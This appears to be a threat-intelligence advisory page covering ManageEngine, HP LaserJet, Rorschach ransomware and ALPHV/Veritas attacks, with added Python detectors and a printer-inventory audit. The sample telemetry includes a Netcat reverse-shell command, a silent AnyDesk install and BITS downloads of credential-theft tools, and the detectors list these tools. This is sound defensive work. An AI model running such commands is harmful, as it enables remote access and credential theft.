
    What are the Actionable Threat Warnings? | Threat Advice

    ACTIONABLE - Severity: High - TLP:GREEN - Experts Sound Alarm Over Growing Attacks Exploiting Zoho ManageEngine Products

    Summary:

    “Multiple threat actors have been observed opportunistically weaponizing a now-patched critical security vulnerability impacting several Zoho ManageEngine products since January 20, 2023. Tracked as CVE-2022-47966 (CVSS score: 9.8), the remote code execution flaw allows a complete takeover of the susceptible systems by unauthenticated attackers. As many as 24 different products, including Access Manager Plus, ADManager Plus, ADSelfService Plus, Password Manager Pro, Remote Access Plus, and Remote Monitoring and Management (RMM), are affected by the issue” (The Hacker News, 2023).

    The development comes after penetration testing firm Horizon3 released proof-of-concept (PoC) code for CVE-2022-47966 last month. According to researchers at Bitdefender, attacks exploiting the flaw began the day after the PoC was released. The majority of the attacks observed targeted victims located in Australia, Canada, Italy, Mexico, the Netherlands, Nigeria, Ukraine, the United Kingdom, and the United States. As of writing, between 2,000 and 4,000 internet-accessible servers are running one of the impacted Zoho ManageEngine products. However, researchers say not all of those servers are exploitable with the current PoC code, since the vulnerable code path is only reachable on instances where SAML single sign-on has been configured.

    Analyst comments:

    Bitdefender notes a now-common pattern among threat actors: identify an RCE vulnerability, preferably one with a public PoC, that impacts as many organizations as possible, then use automated scanners to find and compromise vulnerable systems at scale. CVE-2022-47966 is the latest RCE to be exploited this way, as it impacts over a dozen products used by organizations across the globe and a PoC is publicly available. In the latest attacks exploiting CVE-2022-47966, researchers observed the actors deploying Netcat and Cobalt Strike beacons after initial access was gained. The attackers were also observed installing AnyDesk for persistence. In some cases, the actors attempted to deploy the Buhti ransomware, which appears to be a new group; according to researchers, Buhti is designed to target Linux systems and is written in Go.

    Mitigation:

    (Bitdefender) This vulnerability is another clear reminder of the importance of keeping systems up to date with the latest security patches while also employing strong perimeter defense. Attackers don't need to scour for new exploits or novel techniques when they know that many organizations are vulnerable to older exploits due, in part, to the lack of proper patch management and risk management.

    In addition to prevention and cyber hygiene, multi-layered protection on all endpoints, servers, and workloads is critical. In our telemetry, we have identified the following indicators of compromise detected by different endpoint security modules:

    Implementing IP, domain, and URL reputation is one of the most effective methods of defeating automated vulnerability exploits. According to analysis in the Data Breach Investigations Report 2022, only 0.4% of the IPs that attempted RCE were not seen in a previous attack. Blocking bad IPs, domains, or URLs on all devices, including remote and work-from-home endpoints, can be highly effective.

    Finally, companies of all sizes should implement detection and response capabilities to detect any suspicious activity on the network and minimize the dwell time of adversaries.

    Source:
    https://thehackernews.com/2023/02/experts-sound-alarm-over-growing.html
    https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966
    https://www.manageengine.com/security/advisory/CVE/cve-2022-47966.html
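    The post-exploitation chain above (commands run through the vulnerable product, then Netcat, Cobalt Strike and an AnyDesk install) is visible in process-creation telemetry even where the exploit request itself was never logged, because the affected ManageEngine products run as a Java service and anything the attacker executes descends from that Java process. The script below is an added example, not code from Bitdefender, Horizon3 or Zoho: it rebuilds the process tree from Sysmon-style event records and alerts on shell, Netcat or AnyDesk processes that descend from the ManageEngine Java process. The install path under C:\ManageEngine\, the AnyDesk --install switch and the sample events are assumptions and constructed data.

```python
"""Flag CVE-2022-47966 post-exploitation on a ManageEngine host from process-creation events.

The affected ManageEngine products run as a Java service, so any command an
attacker runs through the vulnerability is executed by that Java process.
The detector rebuilds the process tree from Sysmon-Event-1-like records and
alerts when a shell, Netcat or AnyDesk descends from the ManageEngine Java
process, and separately when AnyDesk is installed unattended.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Assumption: the product is installed under C:\ManageEngine\<product>\ and runs
# java.exe/javaw.exe from its bundled JRE. Adjust to your deployment.
MANAGEENGINE_DIR = re.compile(r"^c:\\manageengine\\", re.IGNORECASE)
JAVA_IMAGE = re.compile(r"\\javaw?\.exe$", re.IGNORECASE)

# Tooling named in the Bitdefender reporting (Netcat, AnyDesk) plus the shells
# and LOLBins it is normally launched through.
SUSPICIOUS_CHILDREN = {
    "nc.exe", "ncat.exe", "netcat.exe", "anydesk.exe",
    "cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe", "certutil.exe",
}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str         # full path of the created process
    command_line: str
    parent_image: str  # full path of the parent, as Sysmon records it


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_manageengine_java(image: str) -> bool:
    return bool(MANAGEENGINE_DIR.match(image)) and bool(JAVA_IMAGE.search(image))


def descends_from_manageengine(event: ProcEvent, by_pid: Dict[int, ProcEvent]) -> bool:
    """Walk up the ancestry we have records for; fall back to the recorded
    parent image when the parent's own creation event was not captured."""
    if is_manageengine_java(event.parent_image):
        return True
    ancestor = by_pid.get(event.ppid)
    for _ in range(16):  # bound the walk in case PID reuse creates a loop
        if ancestor is None:
            return False
        if is_manageengine_java(ancestor.image):
            return True
        ancestor = by_pid.get(ancestor.ppid)
    return False


def find_suspicious(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    by_pid = {e.pid: e for e in events}
    findings: List[Tuple[int, str]] = []
    for e in events:
        name = basename(e.image)
        if name in SUSPICIOUS_CHILDREN and descends_from_manageengine(e, by_pid):
            findings.append((e.pid, f"{name} descends from the ManageEngine Java process"))
        # AnyDesk's unattended install switch (assumption: --install) is how the
        # attackers kept access; an interactive user rarely runs it this way.
        if name == "anydesk.exe" and "--install" in e.command_line.lower():
            findings.append((e.pid, "AnyDesk unattended install"))
    return findings


# Constructed sample telemetry: a benign service start, a benign user process,
# then the post-exploitation chain java.exe -> cmd.exe -> {nc.exe, AnyDesk.exe}.
SAMPLE_EVENTS = [
    ProcEvent(600, 4, r"C:\Windows\System32\services.exe", "services.exe",
              r"C:\Windows\System32\wininit.exe"),
    ProcEvent(1200, 600, r"C:\ManageEngine\ADSelfService Plus\jre\bin\java.exe",
              "java.exe -Dcatalina.home=... org.apache.catalina.startup.Bootstrap",
              r"C:\Windows\System32\services.exe"),
    ProcEvent(2100, 900, r"C:\Windows\System32\notepad.exe", "notepad.exe",
              r"C:\Windows\explorer.exe"),
    ProcEvent(3300, 1200, r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c "C:\\Users\\Public\\nc.exe -e cmd.exe 203.0.113.5 4444"',
              r"C:\ManageEngine\ADSelfService Plus\jre\bin\java.exe"),
    ProcEvent(3310, 3300, r"C:\Users\Public\nc.exe", "nc.exe -e cmd.exe 203.0.113.5 4444",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(3400, 3300, r"C:\Users\Public\AnyDesk.exe",
              r"AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent",
              r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for pid, reason in find_suspicious(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason}")
```

    Feed it Sysmon Event ID 1 records (or EDR process-creation events) for the ManageEngine server; the ancestry walk matters because the attacker's tools are usually launched through an intermediate cmd.exe rather than directly by Java.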

     

    ACTIONABLE - Severity: High - TLP:GREEN - HP to Patch Critical Bug in LaserJet Printers Within 90 Days

    Summary:

    In a security bulletin this week, HP announced that it would take up to 90 days to fix a critical vulnerability impacting several of its business-grade printers that have IPsec enabled and run FutureSmart firmware version 5.6. “IPsec (Internet Protocol Security) is an IP network security protocol suite used in corporate networks to secure remote or internal communications and prevent unauthorized access to assets, including printers. FutureSmart allows users to work and configure printers either from a control panel available at the printer or from a web browser for remote access” (Bleeping Computer, 2023).

    The flaw, tracked as CVE-2023-1707 (CVSS 9.1), affects nearly 50 HP Enterprise LaserJet and HP LaserJet Managed printer models. According to HP, successful exploitation of CVE-2023-1707 could lead to information disclosure, allowing threat actors to access sensitive information transmitted between a vulnerable HP printer and other devices on the network.

    Analyst comments:

    Below is the list of impacted HP printer models:

    • HP Color LaserJet Enterprise M455
    • HP Color LaserJet Enterprise MFP M480
    • HP Color LaserJet Managed E45028
    • HP Color LaserJet Managed MFP E47528
    • HP Color LaserJet Managed MFP E785dn, HP Color LaserJet Managed MFP E78523, E78528
    • HP Color LaserJet Managed MFP E786, HP Color LaserJet Managed Flow MFP E786, HP Color LaserJet Managed MFP E78625/30/35, HP Color LaserJet Managed Flow MFP E78625/30/35
    • HP Color LaserJet Managed MFP E877, E87740/50/60/70, HP Color LaserJet Managed Flow E87740/50/60/70
    • HP LaserJet Enterprise M406
    • HP LaserJet Enterprise M407
    • HP LaserJet Enterprise MFP M430
    • HP LaserJet Enterprise MFP M431
    • HP LaserJet Managed E40040
    • HP LaserJet Managed MFP E42540
    • HP LaserJet Managed MFP E730, HP LaserJet Managed MFP E73025, E73030
    • HP LaserJet Managed MFP E731, HP LaserJet Managed Flow MFP M731, HP LaserJet Managed MFP E73130/35/40, HP LaserJet Managed Flow MFP E73130/35/40
    • HP LaserJet Managed MFP E826dn, HP LaserJet Managed Flow MFP E826z, HP LaserJet Managed E82650/60/70, HP LaserJet Managed E82650/60/70

    Users can no longer download the impacted FutureSmart version from HP. Given that it may take up to 90 days for a patch to be released, users currently running FutureSmart 5.6 on one of the listed models should downgrade to FutureSmart 5.5.0.3 to prevent potential attacks.

    Mitigation:

    If you are using any of the impacted printer models, use HP's official download portal below to source the correct firmware package for your device:
    https://support.hp.com/us-en/drivers

    Source:
    https://www.bleepingcomputer.com/ne...ical-bug-in-laserjet-printers-within-90-days/
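    Checking a printer fleet against the list above by hand is error-prone because HP's bulletin uses shorthand such as E78625/30/35 for three separate models. The script below is an added example, not code from HP or Bleeping Computer: it expands that shorthand into exact model numbers and audits an inventory export, flagging listed models on FutureSmart 5.6.x and separating those with IPsec enabled (the condition in HP's bulletin) from those where IPsec is off but a downgrade is still due. The inventory columns, the firmware-string format and the sample rows are assumptions and constructed data.

```python
"""Audit a printer inventory for the CVE-2023-1707 exposure window.

HP's affected-model list uses shorthand such as "E78625/30/35" for E78625,
E78630 and E78635. expand_models() turns each bullet into exact model tokens
so inventory rows can be matched; audit() then flags devices whose model is
listed and whose FutureSmart firmware is 5.6.x, distinguishing those with
IPsec enabled from those where it is currently off.
"""
import re
from typing import Dict, Iterable, Set, Tuple

# The bullets from HP's list above (the duplicated E82650/60/70 item collapsed).
AFFECTED_BULLETS = [
    "HP Color LaserJet Enterprise M455",
    "HP Color LaserJet Enterprise MFP M480",
    "HP Color LaserJet Managed E45028",
    "HP Color LaserJet Managed MFP E47528",
    "HP Color LaserJet Managed MFP E785dn, HP Color LaserJet Managed MFP E78523, E78528",
    "HP Color LaserJet Managed MFP E786, HP Color LaserJet Managed Flow MFP E786, HP Color LaserJet Managed MFP E78625/30/35, HP Color LaserJet Managed Flow MFP E78625/30/35",
    "HP Color LaserJet Managed MFP E877, E87740/50/60/70, HP Color LaserJet Managed Flow E87740/50/60/70",
    "HP LaserJet Enterprise M406",
    "HP LaserJet Enterprise M407",
    "HP LaserJet Enterprise MFP M430",
    "HP LaserJet Enterprise MFP M431",
    "HP LaserJet Managed E40040",
    "HP LaserJet Managed MFP E42540",
    "HP LaserJet Managed MFP E730, HP LaserJet Managed MFP E73025, E73030",
    "HP LaserJet Managed MFP E731, HP LaserJet Managed Flow MFP M731, HP LaserJet Managed MFP E73130/35/40, HP LaserJet Managed Flow MFP E73130/35/40",
    "HP LaserJet Managed MFP E826dn, HP LaserJet Managed Flow MFP E826z, HP LaserJet Managed E82650/60/70",
]

# A model token: letter, digits, optional lowercase suffix, then zero or more
# "/NN" shorthand suffixes that replace the trailing digits of the base token.
MODEL_TOKEN = re.compile(r"^([A-Z]\d+[a-z]*)((?:/\d+)+)?$")


def expand_models(bullet: str) -> Set[str]:
    models: Set[str] = set()
    for item in bullet.split(","):
        token = item.strip().split()[-1]
        m = MODEL_TOKEN.match(token)
        if not m:
            raise ValueError(f"unrecognised model token: {token!r}")
        base, shorthand = m.group(1), m.group(2) or ""
        models.add(base)
        for suffix in shorthand.split("/")[1:]:
            models.add(base[: -len(suffix)] + suffix)
    return models


AFFECTED_MODELS: Set[str] = set().union(*(expand_models(b) for b in AFFECTED_BULLETS))

# Firmware strings as exported by the inventory tool (assumed format, e.g. "5.6.0.1").
VERSION = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:\.(\d+))?")


def parse_version(text: str) -> Tuple[int, ...]:
    m = VERSION.search(text)
    if not m:
        raise ValueError(f"no version in {text!r}")
    return tuple(int(g) for g in m.groups() if g is not None)


def audit(inventory: Iterable[Tuple[str, str, bool]]) -> Dict[str, str]:
    """Rows are (model string, firmware string, ipsec_enabled); returns model -> status."""
    result: Dict[str, str] = {}
    for model, firmware, ipsec in inventory:
        token = model.split()[-1]
        if token in AFFECTED_MODELS and parse_version(firmware)[:2] == (5, 6):
            # AT_RISK: not exploitable per the bulletin while IPsec is off, but
            # downgrade before anyone enables it.
            result[model] = "VULNERABLE" if ipsec else "AT_RISK"
        else:
            result[model] = "OK"
    return result


# Constructed inventory rows.
SAMPLE_INVENTORY = [
    ("HP Color LaserJet Managed MFP E78630", "5.6.0.1", True),
    ("HP LaserJet Managed MFP E73140", "5.6.0.1", False),
    ("HP Color LaserJet Enterprise M455", "5.5.0.3", True),
    ("HP LaserJet Enterprise M507", "5.6.0.1", True),
    ("HP Color LaserJet Managed E87760", "5.6.0.2", True),
]

if __name__ == "__main__":
    for model, status in audit(SAMPLE_INVENTORY).items():
        print(f"{status:10s} {model}")
```

    The M507 row shows why the expansion step matters: a model on 5.6 that is not in HP's list is reported OK, while E87760, which only appears on the page as part of E87740/50/60/70, is correctly flagged.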

     

    INFORMATIONAL - Severity: Medium - TLP:GREEN - New Rorschach Ransomware Is the Fastest Encryptor Seen So Far

    Summary:

    Security researchers at Check Point uncovered a new ransomware strain, dubbed Rorschach, whose encryption speed outpaces every strain seen before it. “The encryption scheme blends the curve25519 and eSTREAM cipher hc-128 algorithms and follows the intermittent encryption trend, meaning that it encrypts the files only partially, lending it increased processing speed” (Bleeping Computer, 2023).

    Check Point discovered the ransomware after it was deployed on the network of an unidentified U.S. company using DLL side-loading via a signed component of Cortex XDR, an extended detection and response tool developed by Palo Alto Networks. “The attacker used the Cortex XDR Dump Service Tool (cy.exe) version 7.3.0.16740 to sideload the Rorschach loader and injector (winutils.dll), which led to launching the ransomware payload, “config.ini,” into a Notepad process. The loader file features UPX-style anti-analysis protection, while the main payload is protected against reverse engineering and detection by virtualizing parts of the code using the VMProtect software” (Bleeping Computer, 2023).

    If executed on a Windows domain controller, researchers note that Rorschach creates a Group Policy that propagates the malware to other hosts in the domain. Once a targeted machine is compromised, the ransomware deletes four event logs (Application, Security, System and Windows PowerShell) to erase traces of the compromise.

    Analyst comments:

    Researchers at Check Point ran a test to measure the speed at which Rorschach encrypts files, using 220,200 files on a 6-core CPU machine. Rorschach encrypted all 220,200 files in 4.5 minutes, which is very fast considering that LockBit v2, another strain known to be one of the fastest encryptors, took 7 minutes.

    “After locking the system, the malware drops a ransom note similar to the format used by the Yanluowang ransomware. According to the researchers, a previous version of malware used a ransom note similar to what DarkSide used. Check Point says that this similarity is likely what caused other researchers to mistake a different version of Rorschach with DarkSide, an operation that rebranded to BlackMatter in 2021, and disappeared the same year” (Bleeping Computer, 2023).

    Mitigation:

    Backup your data, system images, and configurations, regularly test them, and keep the backups offline: Ensure that backups are regularly tested and that they are not connected to the business network, as many ransomware variants try to find and encrypt or delete accessible backups. Maintaining current backups offline is critical because if your network data is encrypted with ransomware, your organization can restore systems.

    Update and patch systems promptly: This includes maintaining the security of operating systems, applications, and firmware in a timely manner. Consider using a centralized patch management system; use a risk-based assessment strategy to drive your patch management program.

    Test your incident response plan: There's nothing that shows the gaps in plans more than testing them. Run through some core questions and use those to build an incident response plan: Are you able to sustain business operations without access to certain systems? For how long? Would you turn off your manufacturing operations if business systems such as billing were offline?

    Check your security team's work: Use a third-party pen tester to test the security of your systems and your ability to defend against a sophisticated attack. Many ransomware criminals are aggressive and sophisticated and will find the equivalent of unlocked doors.

    Segment your networks: There's been a recent shift in ransomware attacks, from stealing data to disrupting operations. It's critically important that your corporate business functions and manufacturing/production operations are separated and that you carefully filter and limit internet access to operational networks, identify links between these networks, and develop workarounds or manual controls to ensure ICS networks can be isolated and continue operating if your corporate network is compromised. Regularly test contingency plans such as manual controls so that safety-critical functions can be maintained during a cyber incident.

    Train employees: Email remains the most vulnerable attack vector for organizations. Users should be trained how to avoid and spot phishing emails. Multi-factor authentication can help prevent malicious access to sensitive services.

    Source:
    https://www.bleepingcomputer.com/ne...somware-is-the-fastest-encryptor-seen-so-far/
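    The deployment chain described above (the signed cy.exe side-loading winutils.dll, the payload injected into a Notepad process, four event logs cleared) gives defenders two independent signals that can be correlated before encryption completes. The script below is an added example, not code from Check Point or Palo Alto Networks: it runs over constructed Sysmon-style image-load and process-creation records plus the "log cleared" records Windows writes (Security event 1102, and System event 104 from the Eventlog provider) and reports a side-loaded cy.exe, a Notepad spawned by it, and three or more logs cleared inside a short window. The Cortex XDR install directory, the 120-second window and the sample events are assumptions.

```python
"""Detect the Rorschach deployment chain from constructed host telemetry.

Signal 1: cy.exe (the signed Cortex XDR Dump Service Tool) loading a DLL named
winutils.dll that is unsigned or lives outside the tool's install directory,
and cy.exe spawning notepad.exe as the injection host.
Signal 2: several Windows event logs cleared within a short window.
"""
from typing import Dict, List

# Assumption: the legitimate cy.exe lives under the Cortex XDR install directory;
# a copy running from anywhere else is treated as attacker-staged.
CORTEX_DIR = "c:\\program files\\palo alto networks\\traps"
LOG_CLEAR_WINDOW_SECONDS = 120
TARGET_CHANNELS = {"application", "security", "system", "windows powershell"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def dirname(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[0].lower()


def sideload_findings(events: List[Dict]) -> List[str]:
    out: List[str] = []
    for e in events:
        if (e["kind"] == "image_load" and basename(e["process"]) == "cy.exe"
                and basename(e["image"]) == "winutils.dll"):
            in_vendor_dir = dirname(e["image"]).startswith(CORTEX_DIR)
            if not e["signed"] or not in_vendor_dir:
                out.append(f"cy.exe (pid {e['pid']}) side-loaded {e['image']} (signed={e['signed']})")
        if (e["kind"] == "process_create" and basename(e["parent_image"]) == "cy.exe"
                and basename(e["image"]) == "notepad.exe"):
            out.append(f"cy.exe (pid {e['ppid']}) spawned notepad.exe (pid {e['pid']}): injection host")
    return out


def log_clearing_findings(events: List[Dict]) -> List[str]:
    """Report once when 3+ of the targeted logs are cleared inside the window."""
    clears = sorted((e for e in events if e["kind"] == "log_cleared"), key=lambda e: e["ts"])
    for i, first in enumerate(clears):
        channels = {c["channel"].lower() for c in clears[i:]
                    if c["ts"] - first["ts"] <= LOG_CLEAR_WINDOW_SECONDS}
        hit = channels & TARGET_CHANNELS
        if len(hit) >= 3:
            return [f"{len(hit)} event logs cleared within {LOG_CLEAR_WINDOW_SECONDS}s "
                    f"from t={first['ts']}: {sorted(hit)}"]
    return []


def detect(events: List[Dict]) -> List[str]:
    return sideload_findings(events) + log_clearing_findings(events)


# Constructed sample telemetry (Sysmon-style image loads and process creations,
# plus Security 1102 / System 104 "log cleared" records).
SAMPLE_EVENTS: List[Dict] = [
    # benign: the real tool loading a system DLL from its install directory
    {"kind": "image_load", "ts": 0, "pid": 880,
     "process": r"C:\Program Files\Palo Alto Networks\Traps\cy.exe",
     "image": r"C:\Windows\System32\kernel32.dll", "signed": True},
    # staged copy of cy.exe loading the unsigned injector placed beside it
    {"kind": "image_load", "ts": 100, "pid": 4120,
     "process": r"C:\Users\Public\cy.exe",
     "image": r"C:\Users\Public\winutils.dll", "signed": False},
    {"kind": "process_create", "ts": 101, "pid": 4136, "ppid": 4120,
     "parent_image": r"C:\Users\Public\cy.exe",
     "image": r"C:\Windows\System32\notepad.exe"},
    # the four log-clear records in quick succession
    {"kind": "log_cleared", "ts": 160, "event_id": 104, "channel": "Application"},
    {"kind": "log_cleared", "ts": 161, "event_id": 1102, "channel": "Security"},
    {"kind": "log_cleared", "ts": 162, "event_id": 104, "channel": "System"},
    {"kind": "log_cleared", "ts": 163, "event_id": 104, "channel": "Windows PowerShell"},
    # benign: an administrator clearing a single log hours later
    {"kind": "log_cleared", "ts": 20000, "event_id": 104, "channel": "Application"},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

    Because the log-clearing step destroys the Security and System logs on the host, the 1102/104 records only survive if they are forwarded off-box as they are written; the correlation above assumes a central collector.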

    INFORMATIONAL - Severity: Medium - TLP:GREEN - ALPHV Ransomware Exploits Veritas Backup Exec Bugs for Initial Access

    Summary:

    Researchers observed an affiliate of ALPHV exploiting three vulnerabilities in Veritas Backup Exec to gain initial access to target networks. The ALPHV ransomware group was founded in December 2021 and is believed to be run by former members of the DarkSide and BlackMatter ransomware groups, who shut down their operations to avoid law enforcement pressure.

    "Mandiant reports that it observed the first cases of Veritas flaws exploitation in the wild on October 22, 2022. The high-severity flaws targeted by UNC4466 are:

    • CVE-2021-27876: Arbitrary file access flaw caused by an error in the SHA authentication scheme, allowing a remote attacker to gain unauthorized access to vulnerable endpoints. (CVSS score: 8.1)
    • CVE-2021-27877: Remote unauthorized access and privileged command execution to the BE Agent via SHA authentication. (CVSS score: 8.2)
    • CVE-2021-27878: Arbitrary command execution flaw result of an error in the SHA authentication scheme, allowing a remote attacker to gain unauthorized access to vulnerable endpoints. (CVSS score: 8.8)

    All three flaws impact the Veritas Backup software. The vendor disclosed them in March 2021 and released a fix with version 21.2. However, despite over two years having passed since then, many endpoints remain vulnerable as they have not updated to a safe version." (Bleeping Computer, 2023)

    According to Mandiant, a commercial scanning service discovered more than 8,500 IP addresses advertising the "Symantec/Veritas Backup Exec ndmp" service on default ports, making them candidates for exploitation. In September 2022, a Metasploit module was released publicly that lets an attacker establish a session and interact with compromised endpoints. Mandiant identified that UNC4466 began leveraging this module about a month after it became available.

    Analyst comments:

    Mandiant reports that UNC4466 gains access to an internet-facing Windows server running Veritas Backup Exec using the Metasploit module and establishes persistent access to the system. Following the initial compromise, the attacker uses Advanced IP Scanner and ADRecon to collect information about the victim's network, then downloads additional tools, including LAZAGNE, LOGOLO, WINSW, RCLONE, and the ALPHV ransomware encryptor, via the Background Intelligent Transfer Service (BITS).

    Mitigation:

    Backup your data, system images, and configurations, regularly test them, and keep the backups offline: Ensure that backups are regularly tested and that they are not connected to the business network, as many ransomware variants try to find and encrypt or delete accessible backups. Maintaining current backups offline is critical because if your network data is encrypted with ransomware, your organization can restore systems.

    Update and patch systems promptly: This includes maintaining the security of operating systems, applications, and firmware in a timely manner. Consider using a centralized patch management system; use a risk-based assessment strategy to drive your patch management program.

    Test your incident response plan: There's nothing that shows the gaps in plans more than testing them. Run through some core questions and use those to build an incident response plan: Are you able to sustain business operations without access to certain systems? For how long? Would you turn off your manufacturing operations if business systems such as billing were offline?

    Check your security team's work: Use a third-party pen tester to test the security of your systems and your ability to defend against a sophisticated attack. Many ransomware criminals are aggressive and sophisticated and will find the equivalent of unlocked doors.

    Segment your networks: There's been a recent shift in ransomware attacks, from stealing data to disrupting operations. It's critically important that your corporate business functions and manufacturing/production operations are separated and that you carefully filter and limit internet access to operational networks, identify links between these networks, and develop workarounds or manual controls to ensure ICS networks can be isolated and continue operating if your corporate network is compromised. Regularly test contingency plans such as manual controls so that safety-critical functions can be maintained during a cyber incident.

    Train employees: Email remains the most vulnerable attack vector for organizations. Users should be trained how to avoid and spot phishing emails. Multi-factor authentication can help prevent malicious access to sensitive services.

    Source:
    https://www.bleepingcomputer.com/ne...-veritas-backup-exec-bugs-for-initial-access/
    https://www.mandiant.com/resources/blog/alphv-ransomware-backup
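    UNC4466's staging of LaZagne, rclone, WinSW and the encryptor over BITS is the step most visible to a SOC, because Windows records each BITS job together with its URL in the Microsoft-Windows-Bits-Client/Operational log (event ID 59 for a job start). The script below is an added example, not Mandiant's tooling: it parses messages in that shape (the wording is reconstructed here, not copied from a live system), extracts the URL, and flags executable or archive downloads from hosts outside an allowlist as well as file names matching the tooling named above. The allowlist, the extension list and the sample messages are assumptions and constructed data.

```python
"""Flag tool staging over BITS from Bits-Client operational log messages.

A BITS job start is logged with its URL; the detector extracts that URL and
reports payload-type downloads from unapproved hosts and file names that
match the tooling observed in the UNC4466 intrusions.
"""
import posixpath
import re
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# Reconstructed shape of the event ID 59 message text (assumption).
JOB_START = re.compile(
    r"BITS started the (?P<job>.+?) transfer job that is associated with the (?P<url>\S+) URL"
)

# Hosts BITS legitimately pulls from on a typical server (assumption; tune per estate).
ALLOWED_HOST_SUFFIXES = ("windowsupdate.com", "delivery.mp.microsoft.com", "download.microsoft.com")
PAYLOAD_EXTENSIONS = {".exe", ".dll", ".zip", ".7z", ".ps1", ".bat", ".msi"}
# Tooling named in the Mandiant reporting above.
KNOWN_TOOLING = ("lazagne", "rclone", "winsw", "logolo", "advanced_ip_scanner", "adrecon")


def host_allowed(host: str) -> bool:
    host = host.lower()
    return any(host == s or host.endswith("." + s) for s in ALLOWED_HOST_SUFFIXES)


def inspect_bits_message(message: str) -> Optional[Tuple[str, str, List[str]]]:
    """Return (job, url, reasons) for a job-start message, None for anything else.
    An empty reasons list means the job looked benign."""
    m = JOB_START.search(message)
    if not m:
        return None
    job, url = m.group("job"), m.group("url")
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    filename = posixpath.basename(parsed.path).lower()
    ext = posixpath.splitext(filename)[1]
    reasons: List[str] = []
    if not host_allowed(host):
        if ext in PAYLOAD_EXTENSIONS:
            reasons.append(f"{ext} payload from unapproved host {host}")
        if any(tool in filename for tool in KNOWN_TOOLING):
            reasons.append(f"file name matches known tooling: {filename}")
    return job, url, reasons


def find_tool_downloads(messages: List[str]) -> List[Tuple[str, str, List[str]]]:
    results = (inspect_bits_message(msg) for msg in messages)
    return [r for r in results if r is not None and r[2]]


# Constructed sample messages: one legitimate Edge update, three staged tools,
# one benign document, and a job-stop record that the parser must ignore.
SAMPLE_MESSAGES = [
    "BITS started the MicrosoftEdgeUpdate transfer job that is associated with the "
    "http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/3f1a/MicrosoftEdgeUpdateSetup.exe URL.",
    "BITS started the upd1 transfer job that is associated with the http://203.0.113.50/LaZagne.exe URL.",
    "BITS started the upd2 transfer job that is associated with the http://203.0.113.50/rclone.zip URL.",
    "BITS started the reports transfer job that is associated with the https://files.example.net/q1/report.pdf URL.",
    "BITS started the svc transfer job that is associated with the http://203.0.113.50/tools/winsw.exe URL.",
    "BITS stopped transferring the upd1 transfer job that is associated with the http://203.0.113.50/LaZagne.exe URL.",
]

if __name__ == "__main__":
    for job, url, reasons in find_tool_downloads(SAMPLE_MESSAGES):
        print(f"job {job!r} -> {url}: {'; '.join(reasons)}")
```

    The Bits-Client operational channel is not forwarded by default in many estates; enabling it on internet-facing backup servers is cheap and turns this stage of the intrusion into a logged event rather than a silent transfer.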
